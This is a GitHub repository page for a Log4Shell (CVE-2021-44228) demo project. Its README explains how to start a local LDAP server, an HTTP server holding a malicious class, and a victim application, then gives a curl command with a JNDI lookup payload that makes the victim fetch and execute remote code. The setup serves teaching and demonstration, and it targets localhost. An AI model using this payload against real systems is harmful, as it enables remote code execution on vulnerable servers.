Skip to content

andi68/log4jExploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
src/main
src/main
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
mvnw
mvnw
 
 
mvnw.cmd
mvnw.cmd
 
 
pom.xml
pom.xml
 
 
requests.http
requests.http
 
 

Repository files navigation

log4j-log4shell-exploit

Demo Project for the Log4j vulnerability.

Demo found here:

To run the demo see https://youtu.be/JYiagUpmxXo (German)

Setup

  1. Install a Java SDK. It works e.g. with Oracle SDK Version 8 or OpenJDK Version 11
  2. Clone this project:
git clone https://github.com/predic8/log4j-log4shell-exploit
  1. Go into the folder:
cd log4j-log4shell-exploit

Run the demo

On Windows use mvnw.cmd instead of ./mvnw

1.) Build the project:

./mvnw package
  1. Start the LdapServer:
/mvnw exec:java -D"exec.mainClass"="de.predic8.LdapServer"

2.) Start the HttpServer:

./mvnw exec:java -D"exec.mainClass"="de.predic8.HttpServer"

3.) Start the victim:

./mvnw exec:java -D"exec.mainClass"="de.predic8.Opfer"

4.) Use curl or your browser to invoke the following URL:

curl "http://localhost:8000/hallo?name=$\{jndi:ldap://localhost:10389/cn=badcode,dc=predic8,dc=de\}"

The victim application will write into its log and the ldap query will be executed. The result of the Ldap query will make the victim loading the malicious class from the HTTP server and executing it.

Please be aware that even hacking attempts are illegal!

log4jExploit

just a test for CVE-2021-44228

About

No description, website, or topics provided.

Resources

Readme

License

Apache-2.0 license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages